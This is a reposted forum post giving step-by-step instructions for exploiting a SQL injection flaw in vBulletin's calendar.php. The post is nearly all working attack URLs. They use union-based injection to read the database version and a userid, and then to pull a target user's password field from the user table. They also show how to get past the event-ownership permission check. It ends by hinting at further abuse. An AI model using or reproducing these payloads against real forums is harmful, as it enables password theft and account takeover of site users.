[转载]The steps to exploit vBulletin forum

信息来源：fatb@zzu
文章作者：fatb

1. Make sure calendar.php do exist.

2. Add a private event:

http://www.xxx.com/calendar.php? ... type=private&s=

3. You will get a eventid(e.g. 14) after that, now check that event.

http://www.xxx.com/calendar.php?s=&action=edit&eventid=14

4. Get your userid

http://www.xxx.com/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate

If the MySQL version is below 4.0.0, this step will fail.

Userid is in subject field(e.g. 31874)

The reason to know the userid is to pass following code.

----------------------------------------------------------------
if ($eventinfo[userid] != $bbuserinfo[userid])
{
$permissions=getpermissions();
if ($permissions[canpublicedit]!=1) {
show_nopermission();
}
}
-----------------------------------------------------------------

5. The dirty part

http://www.xxx.com/calendar.php?s=&action=edit&eventid=14 union (SELECT 1,0,31874,'0000-0-0',password,userid FROM user WHERE userid = 31874) order by eventdate

Let the subject and event fields show the result.

6. There are a lot of other things you would do. ;)